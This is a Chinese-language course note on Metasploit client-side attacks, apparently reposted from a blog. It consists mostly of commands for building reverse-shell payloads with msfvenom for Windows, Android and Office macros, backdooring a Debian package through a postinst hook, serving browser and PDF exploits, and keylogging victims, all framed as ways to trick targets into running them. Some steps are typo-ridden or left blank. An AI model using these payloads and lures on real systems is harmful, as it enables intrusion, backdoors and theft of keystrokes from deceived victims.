MSF(五):客户端渗透
客戶端滲透
安全牛學習Metasploit Framework筆記
在無法突破網絡邊界的情況下轉而攻擊客戶端
1、含有漏洞利用代碼的WEB站點
- 利用客戶端漏洞
2、社會工程學
- 直接騙取到敏感信息
- 含有漏洞利用代碼的DOC、PDF等文檔或Payload,誘騙被害者執行
3、誘騙被害者執行Payload (windows)
注:msfvenom集合了編碼、payload
- msfvenom --list-options -p windows/shell/reverse_tcp
查看payload的基本信息 - msfvenom --platform windows -p windows/shel/reverse_tcp LHOST=x.x.x.x LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i -6 -f exe -o 1.exe
- msfconsole (啟動偵聽,注意payload的port要和前面的msfvenom設置的一樣)
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set LHOST x.x.x.x
set LPORT 9898
exploit
只要目標客戶端執行我們制作的exe文件,我們即可獲得目標shell
4、誘騙被害者執行Payload (Linux Deb安裝包)
- apt-get --download-only install freesweep
因為只需要dep文件,所以加上參數–download-only,下載好的文件保存在/var/cache/qpt/archives - dpkg -x freesweep_0.90-1 i386.deb free
解壓縮目標文件,到指定目錄free下 - mkdir free/DEBIAN && cd free/DEBIAN
- vi control
內容:
- vi postinst
內容:
- msfvenom --platform linux -p linux/x86/shell/reverse_ tcp LHOST=x.x.x.x LPORT=9999 -b "\x00" -f elf -o /root/free/usr/games/freesweep_ scores
- chmod 755 postinst
- dpkg-deb --build /root/free
- 將/root/下的free.deb,傳給目標
- msfconsole啟動偵聽
use exploit/multi/handler
set payload linux/x86/shell/reverse_tcp
set lport 9999
exploit(開啟偵聽) - 只要目標dpkg -i free.deb,安裝該文件,我們偵聽的端口就會獲得反彈的shell
5、利用Acrobat Reader漏洞執行payload
(1)構造PDF文件,誘使目標點擊
- exploit/windows/fileformat/adobe_utilprintf
- set payload windows/meterpreter/reverse_tcp
- exploit
- use exploit/multi/handleer(開啟偵聽)
- set payload windwos/meterpreter/reverse_tcp
- exploit
- 只要目標執行PDF文件,我們即可獲得shell
(2)構造惡意網站:,誘使目標訪問
- exploit/windows/browser/adobe_utilprintf
- set payload windows/meterpreter/reverse_tcp
- exploit
(原理:只要目標訪問我們設定的網址,便會執行漏洞代碼;隨后反彈shell給我們的攻擊機) - use priv
本地提權 - run post/windows/capture/keylog_recorder
對目標客戶端啟動鍵盤記錄 - msf外tail查看目標鍵盤最新輸入的數據,tail -f實時查看目標鍵盤最新輸入的數據
6、利用Flash插件漏洞執行payload
(1)攻擊模塊一
- use exploit/multi/browser/adobe_flash_hacking_team_uaf
- 設置反彈shell
(2)攻擊模塊二
- use exploit/multi/browser/adobe_flash_opaque_background_uaf
- 設置反彈shell
(3)輔助模塊(該模塊打包所有和瀏覽器相關的漏洞利用模塊)
- use auxiliary/server/browser_autopwn2
- run
在自動選取高質量瀏覽器利用模塊
原理:只要目標瀏覽器訪問了我們設置的地址,便會將自動選取的利用模塊依次利用,可以成功利用的模塊即返回信息
7、利用IE瀏覽器漏洞執行payload
- use exploit/windows/browser/ms14_064_ole_code_execution
- set payload windows/meterpreter/reverse_tcp
- exploit
8、利用JRE漏洞執行payload
(1)攻擊模塊一
- use exploit/multi/browser/java_ jre17_driver_manager
- set payload java/meterpreter/reverse_tcp
(2)攻擊模塊二
- use exploit/multi/browser/java_jre17_jmxbean
- set payload java/meterpreter/reverse_tcp
(3)攻擊模塊三
- use exploit/multi/browser/java_jre17_reflection_types
- set payload java/meterpreter/reverse_tcp
9、生成Android后門]程序
(1)攻擊模塊一(這種方法我沒有生成apk,因為-f參數沒有apk選項,所以干脆省略,但使用安卓手機解析時會顯示出問題)
- use payload/android/meterpreter/reverse_tcp
- generate -f a.apk -p android -o peak.apk
-p:目標平臺、-o:生成文件 - use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
(2)攻擊方法二(因為-f不存在apk,所以可以將-f參數省略,直接-o或>,這一種解析不會出問題) - msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=192.168.100.162 lport=8899 -o peak.apk
- use /exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- exploit
10、VBScript感染方式
(1)利用宏感染word、excel文檔,繞過某些基于文件類型檢查的安全機制
(2)生成vbscript腳本msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 - e x86/shikata_ga_nai -f vba-exe
(3)Office 2007 +(office版本2007以上)
- 新建word文檔,選擇視圖一一宏一一創建
- 在創建的宏里粘入Payload第一部分的VBA代碼
- word文檔正文沾入Payload第二部分的內容
由
Jjiktezjhl
到最后
(4)Msf啟動偵聽 - use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- exploit
(5)只要目標打開office,攻擊機即可獲得shell
總結
以上是生活随笔為你收集整理的MSF(五):客户端渗透的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 封灵档案和谐模式是什么意思
- 下一篇: 虎牙直播如何直播游戏(直播个人中心)